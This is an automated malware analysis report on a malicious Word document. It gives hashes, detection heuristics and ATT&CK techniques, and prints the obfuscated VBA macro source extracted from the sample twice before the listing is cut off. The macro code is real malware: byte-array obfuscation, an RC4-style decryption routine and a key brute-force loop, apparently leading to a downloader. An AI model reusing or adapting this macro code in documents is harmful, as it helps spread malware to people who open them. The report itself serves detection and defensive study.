Office (OLE) malware analysis — malicious · d8a2384a51cd59f6

MALICIOUS

Office (OLE)

96.0 KB Created: 2018-09-24 11:06:00 Authoring application: Microsoft Office Word First seen: 2019-01-11

MD5: 1ca60c0dd514d53946d2b777793daa1a SHA-1: ef1fe8485ba0396af74fb7c9f9b20e696fd63b73 SHA-256: d8a2384a51cd59f6390e6a4fcb04b51358cdbd5e04cae5be23daae548c306a73

162 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros, as indicated by the OLE_VBA_MACROS heuristic and the presence of the 'macros.bas' file. The VBA code utilizes GetObject and CallByName functions, suggesting an attempt to execute arbitrary code. While the script is truncated, its structure and the presence of obfuscated byte arrays point towards a downloader or dropper functionality, likely aiming to fetch and execute a second-stage payload.

Heuristics 5

ClamAV: Doc.Malware.Valyria-9761059-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-9761059-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
GetObject call high OLE_VBA_GETOBJ

GetObject call
CallByName call high OLE_VBA_CALLBYNAME

CallByName call
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 28864 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	28864 bytes
SHA-256: `cd5271719c2e5715c2548c4238181e8e4500efe48de77cf91f98fb00c044df31`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Control = "sub1, 0, 0, MSForms, Frame" Dim dim9, dim98(2) As Byte, dim87(9) As Byte, dim76(32) As Byte, dim75(19) As Byte, dim55(13) As Byte, dim6(5) As Byte, dim70(55) As Byte, dim02(805) As Byte, dim53(5) As Byte, dim64(22) As Byte, dim29(22) As Byte, dim44(1 To 255) As Byte Private Function dim61() Dim dim92, dim57, dim73, dim46() As Byte, dim08, dim89 dim89 = 1 While dim89 <= (2236860 / 8772) dim44(dim89) = dim89 dim89 = dim89 + 1 Wend dim05 dim93 dim08 = (281088 / 1098) dim21 While dim57 = 0 dim46 = CStr(dim92) dim73 = dim81(dim46()) If dim73 >= 1 Then dim6(2) = dim46(0) + (dim46(1) * dim08) If dim73 >= 3 Then dim6(3) = dim46(2) + (dim46(3) * dim08) If dim73 >= 5 Then dim6(4) = dim46(4) + (dim46(5) * dim08) If dim73 >= 7 Then dim6(5) = dim46(6) + (dim46(7) * dim08) If dim73 >= 9 Then dim6(6) = dim46(8) + (dim46(9) * dim08) End If End If End If End If End If If dim45(dim00(dim64(), dim15(dim6()), 22), dim29, 22) = 1 Then dim57 = 2329 End If dim92 = dim92 + 1 Wend If dim57 = 2329 Then dim19 Else MsgBox dim57 End If End Function Private Sub dim93() dim64(20) = dim44(214) dim64(18) = dim44(204) dim64(19) = dim44(165) dim64(5) = dim44(31) dim64(9) = dim44(201) dim64(10) = dim44(5) dim64(14) = dim44(149) dim64(22) = dim44(204) dim64(4) = dim44(2) dim64(15) = dim44(150) dim64(0) = dim44(209) dim64(3) = dim44(214) dim64(11) = dim44(74) dim64(1) = dim44(143) dim64(21) = dim44(17) dim64(8) = dim44(217) dim64(2) = dim44(52) dim64(6) = dim44(245) dim64(16) = dim44(230) dim64(17) = dim44(124) dim64(12) = dim44(166) dim64(7) = dim44(144) dim64(13) = dim44(173) End Sub Private Function dim20(dim90) Dim dim77(1) As Byte, dim50, dim68, dim78 If dim90 > (1116135 / 4377) Then dim50 = dim36(dim90, (-4310 + 4566)) dim78 = dim90 / (5335 - 5079) dim68 = dim78 Else dim50 = dim90 End If dim77(0) = dim50 dim77(1) = dim68 dim20 = dim77 End Function Private Function dim00(dim07() As Byte, dim22() As Byte, dim7) On Error Resume Next Dim dim2(0 To 255), dim31, dim0, dim11, dim97() As Byte, dim59 While dim31 <= (660195 / 2589) dim2(dim31) = dim22(dim31) dim31 = dim31 + 1 Wend dim31 = 0 dim97 = dim07() While dim31 <= dim7 dim0 = dim36((dim0 + 1), (-3071 + 3327)) dim11 = dim36((dim11 + dim2(dim0)), (-1952 + 2208)) dim59 = dim2(dim0) dim2(dim0) = dim2(dim11) dim2(dim11) = dim59 dim97(dim31) = dim51(dim97(dim31), (dim2(dim36((dim2(dim0) + dim2(dim11)), (1377024 / 5379))))) dim31 = dim31 + 1 Wend dim00 = dim97 End Function Private Function dim45(dim60() As Byte, dim24() As Byte, dim01) Dim dim94, dim26 On Error GoTo dim42 dim26 = 1 dim94 = 0 While dim94 <= dim01 If dim60(dim94) <> dim24(dim94) Then dim26 = 0 End If dim94 = dim94 + 1 Wend dim45 = dim26 Exit Function dim42: dim45 = 0 End Function Private Sub dim30() dim98(1) = dim44(217) dim98(2) = dim44(2) dim98(0) = dim44(212) End Sub Private Sub dim18() dim87(9) = dim44(137) dim87(5) = dim44(51) dim87(1) = dim44(212) dim87(4) = dim44(22) dim87(8) = dim44(128) dim87(7) = dim44(176) dim87(6) = dim44(223) dim87(2) = dim44(25) dim87(3) = dim44(231) dim87(0) = dim44(192) End Sub Private Sub dim04() dim55(4) = dim44(47) dim55(12) = dim44(250) dim55(3) = dim44(231) dim55(10) = dim44(89) dim55(2) = dim44(23) dim55(13) = dim44(180) dim55(7) = dim44(167) dim55(8) = dim44(155) dim55(9) = dim44(159) dim55(1) = dim44(204) dim55(5) = dim44(19) dim55(11) = dim44(17) dim55(0) = dim44(192) dim55(6) = dim44(223) End Sub Private Sub dim19() Dim dim2() As Byte dim2 = dim15(dim6()) dim85 Dim dim28 Set dim28 = dim62(dim95(dim00(dim70(), dim2(), 56), 56)) dim30 dim32 dim83 Dim dim66 dim66 = dim95(dim00(dim02(), dim2(), 806), 806) dim14 dim18 dim04 dim91 Dim dim52, dim38 ... (truncated)

SHA-256: cd5271719c2e5715c2548c4238181e8e4500efe48de77cf91f98fb00c044df31

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "sub1, 0, 0, MSForms, Frame"
Dim dim9, dim98(2) As Byte, dim87(9) As Byte, dim76(32) As Byte, dim75(19) As Byte, dim55(13) As Byte, dim6(5) As Byte, dim70(55) As Byte, dim02(805) As Byte, dim53(5) As Byte, dim64(22) As Byte, dim29(22) As Byte, dim44(1 To 255) As Byte
Private Function dim61()
Dim dim92, dim57, dim73, dim46() As Byte, dim08, dim89
dim89 = 1
While dim89 <= (2236860 / 8772)
dim44(dim89) = dim89
dim89 = dim89 + 1
Wend
dim05
dim93
dim08 = (281088 / 1098)
dim21
While dim57 = 0
dim46 = CStr(dim92)
dim73 = dim81(dim46())
If dim73 >= 1 Then
dim6(2) = dim46(0) + (dim46(1) * dim08)
If dim73 >= 3 Then
dim6(3) = dim46(2) + (dim46(3) * dim08)
If dim73 >= 5 Then
dim6(4) = dim46(4) + (dim46(5) * dim08)
If dim73 >= 7 Then
dim6(5) = dim46(6) + (dim46(7) * dim08)
If dim73 >= 9 Then
dim6(6) = dim46(8) + (dim46(9) * dim08)
End If
End If
End If
End If
End If
If dim45(dim00(dim64(), dim15(dim6()), 22), dim29, 22) = 1 Then
dim57 = 2329
End If
dim92 = dim92 + 1
Wend
If dim57 = 2329 Then
dim19
Else
MsgBox dim57
End If
End Function
Private Sub dim93()
dim64(20) = dim44(214)
dim64(18) = dim44(204)
dim64(19) = dim44(165)
dim64(5) = dim44(31)
dim64(9) = dim44(201)
dim64(10) = dim44(5)
dim64(14) = dim44(149)
dim64(22) = dim44(204)
dim64(4) = dim44(2)
dim64(15) = dim44(150)
dim64(0) = dim44(209)
dim64(3) = dim44(214)
dim64(11) = dim44(74)
dim64(1) = dim44(143)
dim64(21) = dim44(17)
dim64(8) = dim44(217)
dim64(2) = dim44(52)
dim64(6) = dim44(245)
dim64(16) = dim44(230)
dim64(17) = dim44(124)
dim64(12) = dim44(166)
dim64(7) = dim44(144)
dim64(13) = dim44(173)
End Sub
Private Function dim20(dim90)
Dim dim77(1) As Byte, dim50, dim68, dim78
If dim90 > (1116135 / 4377) Then
dim50 = dim36(dim90, (-4310 + 4566))
dim78 = dim90 / (5335 - 5079)
dim68 = dim78
Else
dim50 = dim90
End If
dim77(0) = dim50
dim77(1) = dim68
dim20 = dim77
End Function
Private Function dim00(dim07() As Byte, dim22() As Byte, dim7)
On Error Resume Next
Dim dim2(0 To 255), dim31, dim0, dim11, dim97() As Byte, dim59
While dim31 <= (660195 / 2589)
dim2(dim31) = dim22(dim31)
dim31 = dim31 + 1
Wend
dim31 = 0
dim97 = dim07()
While dim31 <= dim7
dim0 = dim36((dim0 + 1), (-3071 + 3327))
dim11 = dim36((dim11 + dim2(dim0)), (-1952 + 2208))
dim59 = dim2(dim0)
dim2(dim0) = dim2(dim11)
dim2(dim11) = dim59
dim97(dim31) = dim51(dim97(dim31), (dim2(dim36((dim2(dim0) + dim2(dim11)), (1377024 / 5379)))))
dim31 = dim31 + 1
Wend
dim00 = dim97
End Function
Private Function dim45(dim60() As Byte, dim24() As Byte, dim01)
Dim dim94, dim26
On Error GoTo dim42
dim26 = 1
dim94 = 0
While dim94 <= dim01
If dim60(dim94) <> dim24(dim94) Then
dim26 = 0
End If
dim94 = dim94 + 1
Wend
dim45 = dim26
Exit Function
dim42:
dim45 = 0
End Function
Private Sub dim30()
dim98(1) = dim44(217)
dim98(2) = dim44(2)
dim98(0) = dim44(212)
End Sub
Private Sub dim18()
dim87(9) = dim44(137)
dim87(5) = dim44(51)
dim87(1) = dim44(212)
dim87(4) = dim44(22)
dim87(8) = dim44(128)
dim87(7) = dim44(176)
dim87(6) = dim44(223)
dim87(2) = dim44(25)
dim87(3) = dim44(231)
dim87(0) = dim44(192)
End Sub
Private Sub dim04()
dim55(4) = dim44(47)
dim55(12) = dim44(250)
dim55(3) = dim44(231)
dim55(10) = dim44(89)
dim55(2) = dim44(23)
dim55(13) = dim44(180)
dim55(7) = dim44(167)
dim55(8) = dim44(155)
dim55(9) = dim44(159)
dim55(1) = dim44(204)
dim55(5) = dim44(19)
dim55(11) = dim44(17)
dim55(0) = dim44(192)
dim55(6) = dim44(223)
End Sub
Private Sub dim19()
Dim dim2() As Byte
dim2 = dim15(dim6())
dim85
Dim dim28
Set dim28 = dim62(dim95(dim00(dim70(), dim2(), 56), 56))
dim30
dim32
dim83
Dim dim66
dim66 = dim95(dim00(dim02(), dim2(), 806), 806)
dim14
dim18
dim04
dim91
Dim dim52, dim38
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.